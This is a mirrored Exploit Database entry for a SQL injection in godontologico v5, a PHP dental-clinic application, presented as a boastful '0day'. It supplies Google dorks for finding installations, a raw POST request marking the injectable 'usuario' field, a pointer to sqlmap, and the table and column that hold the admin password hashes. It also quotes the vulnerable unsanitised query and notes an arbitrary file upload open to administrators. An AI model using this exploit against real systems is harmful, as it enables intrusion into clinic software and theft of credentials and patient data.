godontologico 5 – SQL Injection

• Exploit Database
• 11 阅读

• 作者： vinicius777
  日期： 2014-01-23
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/31141/

• ########################################################################################
  [+] Exploit: 0day godontologico v5 - SQL Inject#
  [+] Author: vinicius777					 #
  [+] Contact: vinicius777 [AT] gmail - @vinicius777_#	 
  [+] Vendor Homepage: http://sourceforge.net/projects/godontologico/#
  [+] Google D0rks: "Smile Odonto - Enhancing your smile - www.smileodonto.com.br" #
  [+] Google D0rks: "Smile Odonto ® - Valorizando seu sorriso - www.smileodonto.com.br"#
  ########################################################################################
  
  ### Mummy bought me a new hat today #
  
   You can considerate it a 0day! Once logged as 'admin' browse to 'Utilites' ->'Files' -> 'Clinic Files', upload whatever you want to, access it by clicking in 'View File' or browse directly through 'http://xxx/arquivos/daclinica/files. Enjoy it xD ###
  
   
  [1] Sql Injection POST Time Based Blind
  
  #Note: Time based Injection on POST requests as indicated on the output. You might use sqlmap -l to load it though. Admin hashes under Table ‘funcionarios' on column ‘senha'.
  
  PoC:
  
  POST /gco/wallpapers/index_ajax.php HTTP/1.1
  Host: localhost
  User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  Referer: http://localhost/gco/
  Content-Length: 61
  Cookie: __atuvc=3%7C3; res_session=5mYRbQ67qPN3Zx%2FH%2FPKLDcSgbu3FmjzVAfezt0G0Hapsi7GRhIzlauDhsVpWaAeOu8MAa2wkiyHTT%2BGemuchDNMd1kQYMKbXSp6MFx8BS6A05M%2FIxw0vP2XGGDE5iSzrDERGO6QQa4pOXRjpMD4aYL8%2BQPCj98JZrngcZnhoEFWekObo5EWdnnuhg8zpmWL26dMuzY9uPu%2BO60BwSiVU0CCrFKxc5lMkSH%2BE9%2FwxI4XQpVE%2Bb9X4StmPGMMiZ1it0mJcChZdz4Mku1WJcOrzLVN0RYZYIvARwBiMXdGf%2Bvpw%2F0MHPP09fBv0PRgNI4XAI9apbQ7RLlxK6LneiNaR0epLS1YQiRpucBxtI0AiKofvOK5THZM6KSenIxsqUsrSxtff6eic0prlZb%2Fvl%2B3unAIgFdcAREUhQZ6lytABxA3CRMuZUmb2lyU7cWb%2FnyhQ9BtCXtfSTrdJze6JIFxsFg%3D%3D; __utma=111872281.1068821941.1389863798.1389863798.1389863798.1; __utmz=111872281.1389863798.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ck_login_id_20=1; ck_login_language_20=en_us; ck_login_theme_20=Sugar5; sLogin=admin; bLicense53=true; ccss=2; ws_session=cbm4nhtn24jn9mhfvbjimjjl55; mySession_ID=rkc83o3o3e5df60aoocpb2bqb1; groupoffice=u8q9fb14k1jqvl0vtaidqr3va1; PHPSESSID=pk5053kt9fh1p1jm8kcvn6kh05; Loggedin=True
  Connection: keep-alive
  Pragma: no-cache
  Cache-Control: no-cache
  
  
  usuario=['SQL INJECTION']&senha=%70%61%73%73&login=%4C%6F%67%69%6E
  
  
  
  Vulnerable Code:
  [+] wallpapers/index_ajax.php
  
  
  	$nivel = 'Funcionario';
  $row = mysql_fetch_array(mysql_query("SELECT * FROM `funcionarios` WHERE `usuario` = '$_POST[usuario]'"));
  if($row[nome] == "") {
  $nivel = 'Dentista';
  $row = mysql_fetch_array(mysql_query("SELECT * FROM `dentistas` WHERE `usuario` = '$_POST[usuario]'"));
  if($row[nome] == "") {
  //echo "<scr"."ipt>alert('Login ou senha incorretos!'); Ajax('wallpapers/index', 'conteudo', '')</scr"."ipt>";
  }
  
  
  #
  #
  # Greetz to g0tm1lk and TheColonial.